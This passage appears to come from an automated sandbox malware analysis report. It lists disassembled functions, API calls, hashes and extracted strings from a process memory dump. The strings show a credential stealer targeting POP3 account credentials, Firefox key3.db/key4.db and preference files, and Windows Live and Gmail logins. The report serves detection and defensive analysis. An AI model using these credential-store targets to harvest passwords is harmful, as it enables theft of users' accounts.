                                                              • memset.MSVCRT ref: 0040FA1E
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                              • _strnicmp.MSVCRT ref: 0040FA4F
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                              • String ID: WindowsLive:name=*$windowslive:name=
                                                              • API String ID: 945165440-3589380929
                                                              • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                              • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                                              • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                              • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                                              Function 004036E5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbscpy$sprintfstrchrstrlen
                                                              • String ID: %s@gmail.com
                                                              • API String ID: 3902205911-4097000612
                                                              • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                              • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                              • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                              • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                              Function 004094A2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 004094C8
                                                              • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                              • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                              • memset.MSVCRT ref: 0040950C
                                                              • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                              • _strcmpi.MSVCRT ref: 00409531
                                                                • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                              • String ID: sysdatetimepick32
                                                              • API String ID: 3411445237-4169760276
                                                              • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                              • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                              • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                              • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                              Function 004034E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00403504
                                                              • memset.MSVCRT ref: 0040351A
                                                              • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                              • _mbscat.MSVCRT ref: 0040356D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbscatmemset$_mbscpystrlen
                                                              • String ID: InstallPath$Software\Group Mail$fb.dat
                                                              • API String ID: 632640181-966475738
                                                              • Opcode ID: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                              • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                              • Opcode Fuzzy Hash: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                              • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                              Function 00405983 Relevance: 12.2, APIs: 8, Instructions: 200windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                                              • EndDialog.USER32(?,00000002), ref: 00405A96
                                                              • EndDialog.USER32(?,00000001), ref: 00405AA9
                                                                • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                                                • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                                                • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                                              • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                                              • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Item$DialogMessageSend
                                                              • String ID:
                                                              • API String ID: 2485852401-0
                                                              • Opcode ID: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                              • Instruction ID: 49f8b46d81ffaaf96d74304be2fa091063820ac2067ea90d1efd1f4607779086
                                                              • Opcode Fuzzy Hash: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                              • Instruction Fuzzy Hash: BC619230600A45ABEB21AF65C8C5A2BB7A5EF40718F04C23BF515A76D1E778EA50CF58
                                                              Function 0040B38F Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                              • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                              • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                              • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                              • GetSysColor.USER32(0000000F), ref: 0040B472
                                                              • DeleteObject.GDI32(?), ref: 0040B4A6
                                                              • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                              • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$DeleteImageLoadObject$Color
                                                              • String ID:
                                                              • API String ID: 3642520215-0
                                                              • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                              • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                              • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                              • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                              Function 00405BD9 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405BE9
                                                              • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405C05
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C2B
                                                              • memset.MSVCRT ref: 00405C3B
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C6A
                                                              • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405CB7
                                                              • SetFocus.USER32(?,?,?,?), ref: 00405CC0
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405CD0
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                              • String ID:
                                                              • API String ID: 2313361498-0
                                                              • Opcode ID: 65c1053850b536f20c9e4e8c1a21b7c0142c4311e31a1eb4f029477ac17a45e0
                                                              • Instruction ID: 76b7db47255e00c5a16d586f34bfaf53fe76d4163934589152c5d70c184cfcdd
                                                              • Opcode Fuzzy Hash: 65c1053850b536f20c9e4e8c1a21b7c0142c4311e31a1eb4f029477ac17a45e0
                                                              • Instruction Fuzzy Hash: AF31B3B1500605AFEB24AF69CC85E2AF7A8FF44354B00853FF55AE76A1D778EC408B94
                                                              Function 0040BB14 Relevance: 12.1, APIs: 8, Instructions: 76COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetClientRect.USER32(?,?), ref: 0040BB33
                                                              • GetWindowRect.USER32(?,?), ref: 0040BB49
                                                              • GetWindowRect.USER32(?,?), ref: 0040BB5C
                                                              • BeginDeferWindowPos.USER32(00000003), ref: 0040BB79
                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040BB96
                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040BBB6
                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040BBDD
                                                              • EndDeferWindowPos.USER32(?), ref: 0040BBE6
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Window$Defer$Rect$BeginClient
                                                              • String ID:
                                                              • API String ID: 2126104762-0
                                                              • Opcode ID: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                              • Instruction ID: 10c9609a041f1aae696d54cc03c31aacdb7ad71aa251d7cd9d71944ddb51ea6f
                                                              • Opcode Fuzzy Hash: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                              • Instruction Fuzzy Hash: 4521C376A00209FFDB518FE8DD89FEEBBB9FB08700F144065FA55A2160C771AA519B24
                                                              Function 004072D6 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                              • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                              • GetDC.USER32(00000000), ref: 004072FB
                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                              • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                              • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                              • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                              • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                              • String ID:
                                                              • API String ID: 1999381814-0
                                                              • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                              • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                              • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                              • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                              Function 004261F7 Relevance: 10.9, APIs: 2, Strings: 5, Instructions: 443COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                              • API String ID: 1297977491-3883738016
                                                              • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                              • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                              • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                              • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                              Function 00449630 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                              • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                              • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                              • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                              • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                              • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                              • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID: gj
                                                              • API String ID: 438689982-4203073231
                                                              • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                              • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                              • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                              • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                              Function 0041230B Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 187COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm$__aullrem
                                                              • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                              • API String ID: 643879872-978417875
                                                              • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                              • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                              • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                              • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                              Function 0040DAC2 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040DAE3
                                                              • memset.MSVCRT ref: 0040DAF7
                                                              • memset.MSVCRT ref: 0040DB0B
                                                                • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC1B
                                                              • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset$strlen$_memicmp
                                                              • String ID: user_pref("
                                                              • API String ID: 765841271-2487180061
                                                              • Opcode ID: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                                              • Instruction ID: f707cbd7524a382ab05823b92859e6f0e78dc23985d18c56f1e7f2c379abc130
                                                              • Opcode Fuzzy Hash: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                                              • Instruction Fuzzy Hash: 0B4175769041189AD714DBA5DC81FDA77ACAF44314F1042BBA605B7181EA38AB49CFA8
                                                              Function 00405810 Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                              • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                              • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                              • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                              • memset.MSVCRT ref: 004058C3
                                                              • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                              • SetFocus.USER32(?), ref: 00405976
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$FocusItemmemset
                                                              • String ID:
                                                              • API String ID: 4281309102-0
                                                              • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                              • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                                              • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                              • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                                              Function 0040A83A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                              • _mbscat.MSVCRT ref: 0040A8FF
                                                              • sprintf.MSVCRT ref: 0040A921
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FileWrite_mbscatsprintfstrlen
                                                              • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                              • API String ID: 1631269929-4153097237
                                                              • Opcode ID: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                              • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                                              • Opcode Fuzzy Hash: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                              • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                                              Function 004080ED Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040810E
                                                                • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                              • LocalFree.KERNEL32(?,?,?,?,?,00000000,67E97B60,?), ref: 004081B9
                                                                • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                              • String ID: POP3_credentials$POP3_host$POP3_name
                                                              • API String ID: 524865279-2190619648
                                                              • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                              • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                              • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                              • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                              Function 00406B6D Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 86stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00406B8E
                                                              • strlen.MSVCRT ref: 00406B99
                                                              • strlen.MSVCRT ref: 00406BFF
                                                              • strlen.MSVCRT ref: 00406C0D
                                                              • strlen.MSVCRT ref: 00406BA7
                                                                • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: strlen$_mbscat_mbscpymemset
                                                              • String ID: key3.db$key4.db
                                                              • API String ID: 581844971-3557030128
                                                              • Opcode ID: 1b23ff19475b214b98e9218dd91c9d20610f24d325a1d0b0b24a5ae2e44b1aaa
                                                              • Instruction ID: ca97bc5828a50012869c36cbd7bca65918f6b78bc9695587552fe8d314e031cf
                                                              • Opcode Fuzzy Hash: 1b23ff19475b214b98e9218dd91c9d20610f24d325a1d0b0b24a5ae2e44b1aaa
                                                              • Instruction Fuzzy Hash: 4B210E3190811D6ADB10AA65DC41ECE77ACDB55318F1104BBF40DF60A1EE38DA958658
                                                              Function 004093B2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$CountInfomemsetstrchr
                                                              • String ID: 0$6
                                                              • API String ID: 2300387033-3849865405
                                                              • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                              • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                              • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                              • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                              Function 004076B7 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 004076D7
                                                              • sprintf.MSVCRT ref: 00407704
                                                              • strlen.MSVCRT ref: 00407710
                                                              • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                              • strlen.MSVCRT ref: 00407733
                                                              • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpystrlen$memsetsprintf
                                                              • String ID: %s (%s)
                                                              • API String ID: 3756086014-1363028141
                                                              • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                              • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                              • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                              • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                              Function 0040C143 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54clipboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                              • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                              • OpenClipboard.USER32(?), ref: 0040C1B1
                                                              • GetLastError.KERNEL32 ref: 0040C1CA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
